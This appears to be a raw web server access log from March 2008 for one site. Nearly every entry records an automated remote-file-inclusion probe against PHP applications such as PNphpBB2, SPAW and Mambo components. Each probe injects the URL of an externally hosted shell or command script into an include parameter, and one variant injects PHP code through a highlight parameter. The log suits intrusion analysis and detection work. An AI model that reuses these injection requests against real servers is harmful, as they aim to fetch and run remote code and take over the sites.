195.205.178.120 - - [31/Mar/2008:17:00:33 -0700] "GET /logs/access.log/errors.php?errors=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
195.205.178.120 - - [31/Mar/2008:17:00:33 -0700] "GET /logs/errors.php?errors=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:48 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:48 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:49 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:55 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:56 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:56 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:58 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:58 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:01:58 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:02:03 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:02:03 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [31/Mar/2008:17:02:03 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:05:13 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:05:13 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:05:13 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.198.89.199 - - [31/Mar/2008:17:05:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
213.198.89.199 - - [31/Mar/2008:17:05:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.101.193.183 - - [31/Mar/2008:17:10:14 -0700] "GET //atom.php5?page=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:12:21 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:12:22 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:12:22 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:12:22 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:12:22 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:12:23 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:13:06 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:13:07 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:13:08 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
84.240.24.67 - - [31/Mar/2008:17:26:32 -0700] "GET /logs/!rfihttp://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.bsfadvisors.com"
84.240.24.67 - - [31/Mar/2008:17:26:34 -0700] "GET /!rfihttp://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:17:26:35 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:17:26:35 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
81.89.137.99 - - [31/Mar/2008:17:26:41 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
81.89.137.99 - - [31/Mar/2008:17:26:41 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.29.65.97 - - [31/Mar/2008:17:26:45 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [31/Mar/2008:17:26:46 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.75.39 - - [31/Mar/2008:17:28:36 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.75.39 - - [31/Mar/2008:17:28:36 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [31/Mar/2008:17:28:58 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [31/Mar/2008:17:28:59 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
189.95.132.84 - - [31/Mar/2008:17:29:18 -0700] "GET /logs/access.log HTTP/1.1" 200 9532 "http://www.google.com.br/search?hl=pt-BR&rlz=1B2GGFB_ptBR267BR267&q=svdigital&btnG=Pesquisar&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.bsfadvisors.com"
189.95.132.84 - - [31/Mar/2008:17:29:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.bsfadvisors.com"
189.95.132.84 - - [31/Mar/2008:17:29:43 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.bsfadvisors.com"
88.151.103.27 - - [31/Mar/2008:17:29:55 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
88.151.103.27 - - [31/Mar/2008:17:29:56 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:31:50 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:31:50 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:31:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:32:16 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:32:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:17:32:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.67.26.84 - - [31/Mar/2008:17:32:26 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [31/Mar/2008:17:32:26 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:17:32:36 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:17:32:36 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:17:32:37 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:17:32:37 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
89.97.211.97 - - [31/Mar/2008:17:32:39 -0700] "GET /!rfihttp://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
89.97.211.97 - - [31/Mar/2008:17:32:40 -0700] "GET /logs/!rfihttp://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:33:05 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.29.32.2 - - [31/Mar/2008:17:33:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:17:33:20 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:17:33:21 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.162.116 - - [31/Mar/2008:17:34:55 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:35:01 -0700] "GET //skin/zero_vote/error.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.93.48.162 - - [31/Mar/2008:17:35:22 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [31/Mar/2008:17:35:22 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [31/Mar/2008:17:35:22 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [31/Mar/2008:17:35:22 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:38:13 -0700] "GET /index.php?pageurl=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.190.39.103 - - [31/Mar/2008:17:40:42 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.190.39.103 - - [31/Mar/2008:17:40:46 -0700] "GET /moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.190.39.103 - - [31/Mar/2008:17:40:46 -0700] "GET /logs/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
212.67.202.72 - - [31/Mar/2008:17:41:24 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.bsfadvisors.com"
212.67.202.72 - - [31/Mar/2008:17:41:24 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.bsfadvisors.com"
212.67.202.72 - - [31/Mar/2008:17:41:25 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:41:41 -0700] "GET //skin/zero_vote/error.php?dir=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:17:43:57 -0700] "GET /logs/access.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:17:43:58 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:17:43:58 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:44:03 -0700] "GET /index.php?pageurl=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
195.248.162.89 - - [31/Mar/2008:17:44:09 -0700] "GET /logs/access_080101.log/include/errors.php=error%22http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
195.248.162.89 - - [31/Mar/2008:17:44:10 -0700] "GET /include/errors.php=error%22http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
195.248.162.89 - - [31/Mar/2008:17:44:10 -0700] "GET /logs/include/errors.php=error%22http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
195.248.162.89 - - [31/Mar/2008:17:44:20 -0700] "GET /logs/access_080101.log/include/errors.php=errors=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:17:44:20 -0700] "GET /logs/access.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:17:44:20 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
195.248.162.89 - - [31/Mar/2008:17:44:20 -0700] "GET /include/errors.php=errors=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
209.216.249.224 - - [31/Mar/2008:17:44:20 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://forum.f1-alliance.ru/images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
195.248.162.89 - - [31/Mar/2008:17:44:20 -0700] "GET /logs/include/errors.php=errors=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.190.39.103 - - [31/Mar/2008:17:44:49 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
72.29.75.39 - - [31/Mar/2008:17:46:41 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [31/Mar/2008:17:46:46 -0700] "GET /logs/access.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [31/Mar/2008:17:47:33 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.75.39 - - [31/Mar/2008:17:47:33 -0700] "GET /logs/access_080101.log/moduleswiwimodspawspaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:17:48:41 -0700] "GET /logs/access.log/errors.php?errors=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:17:48:45 -0700] "GET /errors.php?errors=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
200.180.216.43 - - [31/Mar/2008:17:48:47 -0700] "GET /logs/errors.php?errors=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:49:25 -0700] "GET /logs/access.log/index.php?pageurl=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:49:25 -0700] "GET /index.php?pageurl=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.218.85.18 - - [31/Mar/2008:17:49:25 -0700] "GET /logs/index.php?pageurl=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.55.6.34 - - [31/Mar/2008:17:50:29 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.55.6.34 - - [31/Mar/2008:17:50:29 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.55.6.34 - - [31/Mar/2008:17:50:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:17:51:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
217.11.95.5 - - [31/Mar/2008:17:52:01 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
217.11.95.5 - - [31/Mar/2008:17:52:01 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
217.11.95.5 - - [31/Mar/2008:17:52:02 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
